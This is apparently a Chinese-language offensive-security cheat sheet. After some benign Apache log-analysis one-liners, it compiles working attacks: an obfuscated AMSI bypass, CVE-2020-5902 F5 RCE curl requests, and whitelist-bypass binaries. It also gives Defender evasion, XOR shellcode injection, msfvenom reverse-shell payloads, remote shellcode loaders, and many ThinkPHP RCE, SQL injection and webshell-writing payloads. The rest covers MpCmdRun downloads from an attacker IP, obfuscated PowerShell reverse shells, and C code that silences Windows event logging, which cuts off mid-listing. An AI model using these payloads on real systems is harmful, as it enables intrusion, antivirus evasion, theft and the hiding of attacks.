https://gist.github.com/hvelarde/ceac345c662429447959625e6feb2b47通過狀態碼獲取請求總數awk '{print $9}' /var/log/apache2/access.log | sort | uniq -c | sort –rn
按照IP的請求數量排序awk '{print $1}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head | awk -v OFS='\t' '{"host " $2 | getline ip; print $0, ip}'
按照ua的請求數量排序awk -F'"' '{print $6}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head
按照url的請求數量排序awk '{print $7}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head
按照請求頁面為404的url排序awk '$9 ~ /404/ {print $7}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head按照請求致后端報錯的IP排序awk '$0 ~ /\[error\]/ && match($0, /(client: )(.*)(, server)/, arr) {print arr[2]}' /var/log/apache2/error.log | sort | uniq -c | sort -rn | awk -v OFS='\t' '{"host " $2 | getline ip; print $0, ip}'獲取最近10分鐘的請求awk -v date=$(date +[%d/%b/%Y:%H:%M --date="-10 minutes") '$4 > date' /var/log/nginx/access.log
Bypass AMSI
$a =[Ref].Assembly.GetType('System.Management.Automation.AmsiUt'+'ils')$h="4456625220575263174452554847"$s =[string](0..13|%{[char][int](53+($h).substring(($_*2),2))})-replace " "$b =$a.GetField($s,'NonPublic,Static')$b.SetValue($null,$true)
Bypass AMSI 2
https://github.com/crawl3r/FunWithAMSI直接編譯完使用即可[System.Reflection.Assembly]::LoadFile("C:\\Users\\test\\Desktop\\AmsiFun.dll")[Amsi]::Bypass()
CVE-2020-5902
F5 BIG-IP TMUI RCEhttps://raw.githubusercontent.com/jas502n/CVE-2020-5902/master/CVE-2020-5902.pyRCEcurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'讀文件curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'執行Linux命令/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash/fileSave.jsp?fileName=/tmp/cmd&content=id/tmshCmd.jsp?command=list+/tmp/cmd/tmshCmd.jsp?command=delete+cli+alias+private+list
一些可嘗試繞過白名單的執行
forfiles /p c:\windows\system32 /m notepad.exe /c <bin>explorer.exe /root,"<bin>"pcalua.exe -a <bin>scriptrunner.exe -appvscript <bin>wmic process call create <bin>rundll32.exe advpack.dll, RegisterOCX <bin>
繞過lsa protection
https://github.com/RedCursorSecurityConsulting/PPLKiller
Pezor免殺
使用inline_syscall內聯注入shellcode,結合sgn,donut等項目,增加了一些反調試技巧https://github.com/phra/PEzor$ git clone https://github.com/phra/PEzor.git$ cd PEzor$ sudo bash install.sh$ bash PEzor.sh –h這里測試下mimikatz,-sleep設置為2分鐘,執行后需等兩分鐘打包之前
打包之后
測試下Covenant
動態調用進程注入邏輯
感興趣可閱讀以下https://github.com/dtrizna/DInvoke_PoChttps://rastamouse.me/blog/process-injection-dinvoke/https://thewover.github.io/Dynamic-Invoke/這里測試的是使用donut的python模塊�����。注入notepad進程
在Windows Server 2016和2019中繞過Windows Defender
當獲得了一個webshell的時候,下一步要反彈個shell回來
在嘗試了https://github.com/trustedsec/unicorn獨角獸失敗之后,找到了一篇使用golang將shellcode注入到內存的文章https://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher-it/https://github.com/brimstone/go-shellcodehttps://golang.org/pkg/syscall/?GOOS=windows#NewLazyDLL該代碼利用golang中的syscall包來調用NewLazyDLL 方法來加載Kernel32.dll,加載Kernel32.dll后,即可將其用于尋址和內存分配��。編譯后的代碼將十六進制格式的msfvenom內容用作命令行參數����。由于代碼存在許久,可能直接使用會被檢測到,這里對其進行了修改,重命名所有變量,通過URL方式加載shellcode,為了繞過沙盒,添加了一些其他的參數,如果不存在參數則退出執行��。用powershell下載到服務器
等了幾分鐘,發現文件沒有被刪除,再執行��。Msf收到會話
在嘗試了getuid命令之后,返回了錯誤,查看了以下目錄,還是被刪除了
本地復現了下,可以看到被檢測到了
繞過可以看一下微軟的文章https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/configure-server-exclusions-microsoft-defender-antivirus#list-of-automatic-exclusionsWindows Server 2016和2019上的Microsoft Defender Antivirus自動將您注冊為某些排除項,具體由您指定的服務器角色定義����。請參閱 自動排除項列表 �����。這些排除項不會被windows defender檢查���。
按照文章,創建個目錄PHP5433,修改文件為php-cgi.exe即可繞過wd的防護
使用爛土豆提權
文中webshell: https://github.com/NetSPI/cmdsql
內存中解碼shellcode繞過av
https://github.com/mhaskar/Shellcode-In-Memory-Decoder流程打開一個進程并檢索該進程的HANDLE���。在進程中分配空間(檢索內存地址)�。將數據(shellcode)寫入該進程中��。執行shellcode���。我們可以使用幾個Win32 API執行這些步驟:OpenProcess()VirtualAllocEx()WriteProcessMemory()CreateRemoteThread()正常情況下,我們將原始shellcode直接寫入到內存中,但是如果AV /EDR檢測到了Shellcode,它們肯定會發出警報所以我們在二進制文件中使用可逆的方式把shellcode編碼,再解碼寫入內存來規避防護�����。比如加��、減����、異或����、交換����。使用cs生成個shellcode
使用python進行異或
該腳本讀取我們的shellcode的每個操作碼,然后將其與字節0x01(在這種情況下為我們的密鑰)進行異或,將其打印為如下的shellcode :
現在,我們將開始實現將為我們執行shellcode注入的C代碼�����。編譯方式x86_64-w64-mingw32-gcc decoder.c -o decoder.exe -w我將逐步介紹每個win32 API��。打開過程并獲取一個句柄我們需要選擇一個向其注入shellcode的進程,然后需要檢索該過程的句柄,以便可以對其執行一些操作,我們將使用OpenProcess win32 API
該代碼將您要獲取其句柄的進程ID作為第一個參數,然后它將使用具有PROCESS_ALL_ACCESS訪問權限的OpenProcess()來打開該進程并將該句柄保存在變量process中,最后,為我們打印
成功檢索到該句柄檢索句柄后的下一步將是在該進程內分配空間,我們可以使用VirtualAllocEx()
base_address代表分配的內存的地址16行,我們將打印分配的內存的地址,并將其寫入數據
0x29d0000作為地址,使用x64dbg附加explorer.exe進程,轉到這里看看
可以看到函數VirtualAllocEx已為我們在explorer.exe中分配了內存空間,我們準備寫入數據����。接下來我們解碼shellcode并寫到內存中即使使用這種類型(這里用的是異或)的編碼,我們的shellcode也可能會被標記,因此請確保在操作中使用之前使用更強的編碼并對其進行測試���。這里為測試就只使用的0x01
這段代碼將使用密鑰0x01對每個字節進行解碼后,將我們的shellcode寫入內存中運行
如圖所見,我們將每個字節寫入地址,現在我們用x64dbg進行調試,然后轉到地址 0x3ce0000查看一下:
可以看到shellcode已經寫入進去了��。下一步就是執行shellcode了使用CreateRemoteThread()函數來執行
cshot shellcode遠程加載器
From:https://github.com/anthemtotheego/C_Shothttp://blog.redxorblue.com/2020/07/cshot-just-what-doctor-ordered.htmlC_Shot是一種用C語言編寫的攻擊性安全工具,旨在通過HTTP / HTTPS下載遠程shellcode二進制文件(.bin),注入并執行shellcode����。1.shellcode注入其自己的進程2.使用父進程欺騙將shellcode注入子進程使用C_Shot之類的工具的好處是,我們要執行的惡意代碼沒有存儲在二進制文件中,而是從遠程位置檢索,讀入內存然后執行��。這有助于使諸如C_Shot之類的工具對AV / EDR顯得相當友好,并且不會被發現���。
cl / D _UNICODE / D UNICODE cshot.c
生成分階段payloadmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -a x64 --platform windows -b "\x00" -f raw -o /root/Desktop/DefaultStaged.bin生成無階段payloadmsfvenom -p windows/x64/meterpreter_reverse_tcp LHOST= IP LPORT= PORT -a x64 --platform windows -b "\x00" -f raw -o /root/Desktop/DefaultStageless.bin現在我們已經建立了二進制文件,現在需要一個Web服務��。例如運行python -m SimpleHTTPServer 80,或者將它們托管在外部某個地方��。對于本文中的所有示例,我將使用github托管shellcode�。
確保windows defender打開����。
注入到自己的進程中
測試分階段的shellcode會被windows defender攔截
無階段的shellcode不會被攔截
獲得shell
測試分階段shellcode欺騙父進程方法:
獲得shell
現在測試下CrowdStrike注入到自己的進程,兩種shellcode都被攔截
欺騙父進程
獲得shell
分階段和無階段的shellcode在使用欺騙父進程方法時都可以繞過av�。此工具在公共發行版中,沒有進行任何形式的API隱藏,字符串混淆,內存保護技巧等工作���。如果未進行任何修改,則對該工具的靜態分析應該很容易發現�。
thinkphp滲透手段
thinkphp 3.2.3where注入利用字符串方式作為where傳參時存在注入1) and 1=updatexml(1,concat(0x7e,(user()),0x7e),1)--+exp注入這里使用全局數組進行傳參(不要用I方法),漏洞才能生效public function getuser(){ $User = D('User'); $map = array('id' => $_GET['id']); $user = $User->where($map)->find(); dump($user);}id[0]=exp&id[1]==1 and 1=(updatexml(1,concat(0x7e,(user()),0x7e),1))--+bind注入public function getuser(){ $data['id'] = I('id'); $uname['username'] = I('username'); $user = M('User')->where($data)->save($uname); dump($user);}id[0]=bind&id[1]=0 and 1=(updatexml(1,concat(0x7e,(user()),0x7e),1))&username=fanxingfind/select/delete注入public function getuser(){$user = M('User')->find(I('id'));dump($user);}?id[where]=1 and 1=updatexml(1,concat(0x7e,(user()),0x7e),1)order by注入public function user(){$data['username'] = array('eq','admin');$user = M('User')->where($data)->order(I('order'))->find();dump($user);}order=id and(updatexml(1,concat(0x7e,(select user())),0))此文轉自酒仙橋六號部隊TP5開啟debug下的數據庫連接tp5.0.*在debug模式下如果在數據交互點構造如sql注入���、空參數等方式使數據庫查詢等出錯,在一定情況下可能導致數據庫賬號密碼直接顯示出來�。(報錯信息太細了不仔細容易忽略掉)
在debug模式下找注入點也可以通過報錯語句進行構造,并且由于debug模式可能導致本來沒有回顯的注入變成報錯注入��。當然目標數據庫無法外連的時候,這個注入就挺有用的了��。
關于log文件的利用log文件是runtime/log目錄下的,比較常見的路徑類似:/runtime/log/2020001/01.log ,默認是啟用的,關于該文件主要有以下三點利用方式�����。1.關于http請求的部分常見的log文件會記錄http請求,如果對應的站點存在后臺等登陸,可以通過記錄請求中的cookie登陸后臺�����。
2.關于構造sql注入某些配置下日志還會記錄sql語句的執行和報錯,可以用于構造sql注入,但是一般這種利用比較少,需要先找到數據交互點然后和日志中記錄的賦值以及報錯一一對應����。3.關于cache文件名tp下通過緩存文件獲取webshell是一個老生常談的問題,白盒下理論上都說得通,但是實際上在使用該漏洞的時候是存在部分難點的,如生成cache文件的方式,cache文件名等��。在log文件中可能存在cache文件生成時的報錯,這樣可以確定目標tp的cache文件命名方式等,舉個例子:在某次滲透中目標tp的log文件��。
可以注意到這里由于生成緩存文件出錯,導致直接將緩存文件的文件名輸出�。根據輸出的緩存文件名去猜測生成規則,由于tp5的緩存文件命名默認是md5(value),所以大部分時候可以把文件名等帶進value進行比對�����。這里通過猜測和比對確定是view的文件絕對路徑生成的cache文件名��。
一般來說使用php原生的md5函數去生成md5比較穩妥,筆者為了方便直接在線加密的�����。這里基本上就排除了cache getshell的一大難題�����。之后正常去尋找能進庫的交互點,比如發帖,留言這種,就能想辦法獲取webshell了�。tp5路由thinkphp系列的官方開發文檔是期望網站運維人員將public設置為web根目錄,即使用./public/index.php作為入口文件����。在實際的滲透過程中由于thinkphp是框架涉及很多二次開發,部分開發人員會選擇自定義一個入口文件而不置于public目錄下,如/var/www/html/index.php的形式����。這里會涉及到打exp的路由問題,由于部分開發人員自定的入口文件可能導致調用的路徑出現差異�����。一般來說打exp的時候盡量使用./public/index.php來打,以下列exp為例:?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1可能會出現例如:http://xxx/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1http://xxx/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1http://xxx/index.php?s=\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1所以很多時候不是打一個exp無效就代表沒洞,在黑盒測試的時候可能只是沒有找對路由�。下面是實戰中的案例:
可以看到如果以常規的exp進行測試是返回方法不存在的,因為原生路由被二次開發修改了,所以最終代碼執行的payload如下:
5.0.*和5.1.*相對來說5.0可利用的exp比較5.1要多一些,5.1主要的利用方式還是上面舉例用的exp�����。App.php出現問題的代碼如下:
其實就是把反斜杠認定為類名,最終使得類實例化,具體的分析在這里就不拿出來水字數了�����。而在滲透的過程中大的思路其實是差不多的,嘗試多種exp,嘗試讀log文件等,可以通過簡單比對兩個版本的目錄結構在沒有其他信息的情況下判斷版本��。TP5:
TP5.1:
如果網站不是以/public/作為根目錄的話,又沒通過報錯直接體現版本的,可以通過訪問目錄看目錄是否存在來做判斷比如訪問./thinkphp/,這里不推薦通過/app/目錄來做判斷,因為筆者遇到過很多開發者會修改這個目錄,比方說改成/apps/,/applications/,也就無法準確判斷是5.1還是5.0����。tp3的滲透思路tp3 關于log文件相關的利用同上,目錄一般為./Application/Runtime/logs/xxx/xx_xx_xx.log ,其中xxx為app名,文件名為年_月_日.log,如:Application\Runtime\Logs\Home\16_09_09.log��。sql注入tp3的sql注入指的是框架層面的注入問題,即二次開發的時候如果調用了model內的find, delete, select方法的話,就可能出現注入問題����。對于白盒測試而言,只要model.class.php沒修復然后找到調用了方法的地方就可以挖掘到注入�。以select方法簡單做個分析��。Model.class.php
函數可以接受一個options參數,為了構成注入肯定是要進入到_parseoptions方法,也就是要繞過兩次判斷,也就是只要傳輸的options為數組,同時主鍵不是數組,就能進到_parseOptions方法��。
可以看到傳入options['table']或options['alias']且設置options['where']值為字符串,最終會options直接返回,整個過程是沒有過濾的,然后進到ThinkPHP\Libray\Think\Db\Diver.class.php,進到select方法��。
可以看到sql語句是最后的parseSql生成的����。
跟進到parseWhere方法,只要繞過if,最終的return的sql語句是直接拼接的,也就是注入的產生原因,會直接帶入select方法執行��。
黑盒測試也比較類似,一般情況下找到數據庫交互點后進行注入嘗試即可����。cache寫shellcache寫webshell的難點在于cache文件名的確定,一般情況下是md5(絕對路徑)生成的cache文件,上文也提到某些情況下可以通過log文件確定cache文件名稱cache文件寫入的時候會被注釋,所以需要通過%0d%0a提行繞過注釋�����。所以最終的payload一般為:%0d%0aeval($_POST['cmd']);%0d%0a//找到參數影響頁面的點后通過傳參寫入webshell,本地可以復現,實戰中倒是沒遇到過��。tp3滲透主要思路tp3的滲透在實戰中利用的點比較少,所以一般而言遇到tp3的目標,最主要的思路在于找log,然后通過log去看有沒有后臺之類的,相對來說較一起會比對框架的注入,cache寫shell等靠譜���。tp3 關于log文件相關的利用同tp5,目錄一般為./Application/Runtime/logs/xxx/xx_xx_xx.log ,其中xxx為app名,文件名為年_月_日.log,如:Application\Runtime\Logs\Home\16_09_09.log,文件名的格式可能會有變化,多嘗試一下一般也能找到��。tp6的新型問題tp6的利用鏈關于model.php的__destruct()方法調用其他類__tostring()方法的文已經有人發過了,但是文中把poc打碼了,這里簡單跟一下�。
將對象的lazySave屬性設置為True進入save方法:
然后進updateData方法:
在checkAllowFields方法中調用db方法,圖中方法中框起來的語句是可以拼接的,只需要將這兩個屬性中的一個設置為類對象,即可觸發對象的__toString方法�。之后的利用方式和tp5.*相同�。
接著與tp5.*后的gadget是一致的,最終目的是要這個效果實現代碼執行���。
接下來是構造poc,由于測試利用鏈,筆者手寫了一個unserialize��。
然后通過Dido1960大佬的poc代碼生成payload�����。poc參見:https://github.com/Dido1960/thinkphp/blob/master/v6.0.x/poc/poc.php
該利用鏈需求一個反序列化的可控點,二次開發在使用unserialize后可能導致代碼執行�����。同時也可能利用該問題構成一個tp6的后門,如已經通過其他方式獲取服務器權限,則可在某些地方加入unserialize函數實現反序列化的一個后門����。所有pocThinkphp5 rce poc利用工具https://github.com/wh1t3p1g/phpggchttps://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collectionthinkphp 5.0.221���、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username2�、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password3����、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id4�、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1thinkphp 55���、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1thinkphp 5.0.216��、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id7���、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1thinkphp 5.1.*8��、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=19�����、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd10�����、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E11����、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E12�、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=113����、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd14���、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=115����、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd未知版本16�、?s=index/\think\module/action/param1/${@phpinfo()}17���、?s=index/\think\Module/Action/Param/${@phpinfo()}18����、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}19��、index.php?s=/home/article/view_recent/name/1'header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"20�����、index.php?s=/home/shopcart/getPricetotal/tag/1%2721�、index.php?s=/home/shopcart/getpriceNum/id/1%2722���、index.php?s=/home/user/cut/id/1%2723�、index.php?s=/home/service/index/id/1%2724���、index.php?s=/home/pay/chongzhi/orderid/1%2725����、index.php?s=/home/pay/index/orderid/1%2726����、index.php?s=/home/order/complete/id/1%2727�����、index.php?s=/home/order/complete/id/1%2728�、index.php?s=/home/order/detail/id/1%2729����、index.php?s=/home/order/cancel/id/1%2730�、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+31��、POST /index.php?s=/home/user/checkcode/ HTTP/1.1Content-Disposition: form-data; name="couponid"1')unionselect sleep('''+str(sleep_time)+''')#thinkphp 5.0.23(完整版)debug模式32����、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxxthinkphp 5.0.23(完整版)33���、(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -althinkphp 5.0.10(完整版)34����、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=systemthinkphp 5.1.* 和 5.2.* 和 5.0.*35���、(post)public/index.php (data)c=exec&f=calc.exe&_method=filterThinkphp5 注入 poc需開啟app_debughttp://yoursite/index/index/index?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1http://localhost:8000/index/index/index?username[0]=point&username[1]=1&username[2]=updatexml(1,concat(0x7,user(),0x7e),1)^&username[3]=0http://localhost:8000/index/index/index?username=)unionselect updatexml(1,concat(0x7,user(),0x7e),1)#http://localhost:8000/index/index/index?username[0]=not like&username[1][0]=%%&username[1][1]=233&username[2]=)unionselect 1,user()#http://localhost:8000/index/index/index?orderby[id`|updatexml(1,concat(0x7,user(),0x7e),1)%23]=1http://localhost:8000/index/index/index?options=id`)%2bupdatexml(1,concat(0x7,user(),0x7e),1) from users%23Thinkphp5 文件包含 poc5.0.0<=ThinkPHP5<=5.0.18 �����、5.1.0<=ThinkPHP<=5.1.10創建 application/index/view/index/index.html 文件,內容隨意(沒有這個模板文件的話,在渲染時程序會報錯),并將圖片馬 1.jpg 放至 public 目錄下(模擬上傳圖片操作)����。接著訪問 http://localhost:8000/index/index/index?cacheFile=demo.php 鏈接,即可觸發 文件包含漏洞 ���。Thinkphp5 代碼執行poc5.0.0<=ThinkPHP5<=5.0.10http://localhost/tpdemo/public/?username=mochazz123%0d%0a@eval($_GET[_]);//http://localhost:8000/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1ThinkPHP <= 5.0.13POST /?s=index/indexs=whoami&_method=__construct&method=&filter[]=systemThinkPHP <= 5.0.23�、5.1.0 <= 5.1.16 需要開啟框架app_debugPOST /_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -alThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captchaPOST /?s=xxx HTTP/1.1_method=__construct&filter[]=system&method=get&get[]=ls+-al_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls寫shell進日志_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['x'])?>&寫shell進sessionPOST /?s=captcha HTTP/1.1Cookie: PHPSESSID=kking_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1&包含session getshellPOST /?s=captcha_method=__construct&method=get&filter[]=think\__include_file&get[]=tmp\sess_kking&server[]=1通過日志包含getshell_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../data/runtime/log/201901/21.log&x=phpinfo();&POST /?s=captchaCookie: PHPSESSID=kking_method=__construct&filter[]=think\Session::set&method=get&get[]=abPD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8%2bab&server[]=1+號用urlencode編碼為%2b,前后加ab為了湊足解碼/?s=captcha&r=phpinfo();_method=__construct&method=get&filter[]=think\__include_file&get[]=php://filter/read=convert.base64-decode/resource=c:\www\tmp\sess_kking&server[]=1&POST /?s=captcha&r=phpinfo();Cookie: PHPSESSID=kking_method=__construct&method=get&filter[]=base64_decode&filter[]=think\__include_file&get[]=cGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZGVjb2RlL3Jlc291cmNlPWM6XHd3d1x0bXBcc2Vzc19ra2luZw==&server[]=1&設置sessionPOST /?s=captchaCookie: PHPSESSID=kktest_method=__construct&filter[]=think\Session::set&method=get&get[]=abPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX0dFVFsnciddKSk7Oz8%2bab&server[]=1文件包含POST /?s=captcha&r=cGhwaW5mbygpOw==_method=__construct&filter[]=strrev&filter[]=think\__include_file&method=get&server[]=1&get[]=tsetkk_sses/pmt/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:phpThinkphp6 任意文件創建需可控session參數,如username/index.php?username=<?php phpinfo();?>Cookie:1234567890123456789012345670.phpCookie需32位在runtime\session下生成sess_1234567890123456789012345670.php文件
使用windows defender下載文件
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0>MpCmdRun.exe -DownloadFile -url http://192.168.2.105:8000/payload.c -path c:\\users\\test\\desktop\\1.c
其他利用
Powershell腳本混淆繞過amsi和av
https://github.com/tokyoneon/Chimera以下是Invoke-PowerShellTcp.ps1的片段
$stream = $client.GetStream()[byte[]]$bytes = 0..65535|%{0} #Send back current username and computername$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")$stream.Write($sendbytes,0,$sendbytes.Length) #Show an interactive PowerShell prompt$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')$stream.Write($sendbytes,0,$sendbytes.Length)
經過Chimera處理后
# Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star. $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"() # As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden. [bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0} # Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat. # Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station. # Heeding Ben’s disembodied voice, Luke switches off his computer and uses the Force to guide his aim. # Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight. $PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer. $xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth) # An imperial boarding party blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued.
VirusTotal報告檢測到0個
Kali下安裝sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils gitsudo git clone https://github.com/tokyoneon/chimera /opt/chimerasudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/sudo chmod +x chimera.sh; ./chimera.sh --help在shells /目錄中有幾個Nishang腳本和一些通用腳本�。所有都已經過測試使用腳本之前,請將硬編碼的IP地址(192.168.56.101)更改為您的Kali地址���。/opt/chimera$ sed -i 's/192.168.56.101/<YOUR-IP-ADDRESS>/g' shells/*.ps1所有腳本的默認端口為4444����。如果需要,再次使用sed進行更改���。/opt/chimera$ sed -i 's/4444/<YOUR-DESIRED-PORT>/g' shells/*.ps1f:輸入文件�。-o:輸出文件����。-g:從腳本中省略幾個Nishang特定的特征����。-v:替換變量名稱����。-t:替換數據類型�����。-j:替代函數名稱��。-i:在每一行中插入任意注釋��。-c:用任意數據替換注釋���。-h:將IP地址轉換為十六進制格式�����。-s:替換各種字符串���。-b:在可能的情況下反引號字符串��。-e:過程完成后,檢查混淆文件����。舉例,nc反彈shellnc -v -l -p 4444把混淆好的腳本傳入目標PS> powershell.exe -ep bypass C:\path\to\chimera.ps1獲得shellnc -v -l -p 4444listening on [any] 4444 ...192.168.56.105: inverse host lookup failed: Host name lookup failureconnect to [192.168.56.107] from (UNKNOWN) [192.168.56.105] 49725Windows PowerShell running as user onCopyright (C) 2015 Microsoft Corporation. All rights reserved.PS C:\Users\target>一些使用說明https://github.com/tokyoneon/Chimera/blob/master/USAGE.md
通過掛起EventLog服務線程禁用Windows事件日志
Windows事件日志由svchost.exe托管處理�����。EventLog如果我們列出svchost進程,則會看到許多這樣的進程:
從上面的屏幕截圖中,尚不清楚哪個進程真正托管了該服務,但是如果我們繼續在Process Hacker中逐個檢查進程,我們最終將找到托管該服務的進程,當前為pid 2196:EventLog svchost.exe
通過以下命令獲得eventlog的進程IDGet-WmiObject -Class win32_service -Filter "name = 'eventlog'" | select -exp ProcessId
如果我們查看的svchost.exe線程,則會看到
下面顯示的是,確實,暫停足以使EventLog服務無法注冊任何新事件:沒有掛起時修改個密碼
會注冊新的事件掛起時則沒有新的事件
代碼實現下面是在較高級別下工作的技術代碼:1.使用OpenSCManagerA命令打開服務控制管理器的句柄2.使用OpenServiceA命令打開EventLog服務的句柄3.使用QueryServiceStatusEx命令檢索svchost.exe(托管EventLog)進程ID4.打開svchost.exe進程的句柄(從第3步開始)5.獲取由svchost.exe加載的已加載模塊的列表 EnumProcessModules6.循環瀏覽在步驟5中檢索到的已加載模塊列表,使用查找其名稱并找到模塊的基地址-這是包含服務內部工作的模塊7.獲取模塊信息����。它將返回帶有模塊的起始地址-我們稍后將在確定服務線程是否落入wevtsvc.dll模塊的內存空間時需要這些詳細信息wevtsvc.dll GetModuleInformation EventLog8.枚舉svchost.exe內的所有線程��。Thread32FirstThread32Next9.對于步驟8中的每個線程,使用NtQueryInformationThread命令檢索線程的起始地址10.對于步驟8中的每個線程,檢查線程的起始地址是否屬于svchost.exe內部的內存空間��。wevtsvc.dll11.如果線程的起始地址在內存空間內,則這是我們的目標線程,我們將其掛起wevtsvc.dll SuspendThread12.EventLog 服務現已禁用
#include <iostream>#include <Windows.h>#include <Psapi.h>#include <TlHelp32.h>#include <dbghelp.h>#include <winternl.h>#pragma comment(lib, "DbgHelp")using myNtQueryInformationThread = NTSTATUS(NTAPI*)(IN HANDLE ThreadHandle,IN THREADINFOCLASS ThreadInformationClass,OUT PVOID ThreadInformation,IN ULONG ThreadInformationLength,OUT PULONG ReturnLength);int main(){HANDLE serviceProcessHandle;HANDLE snapshotHandle;HANDLE threadHandle;HMODULE modules[256] = {};SIZE_T modulesSize = sizeof(modules);DWORD modulesSizeNeeded = 0;DWORD moduleNameSize = 0;SIZE_T modulesCount = 0;WCHAR remoteModuleName[128] = {};HMODULE serviceModule = NULL;MODULEINFO serviceModuleInfo = {};DWORD_PTR threadStartAddress = 0;DWORD bytesNeeded = 0;myNtQueryInformationThread NtQueryInformationThread = 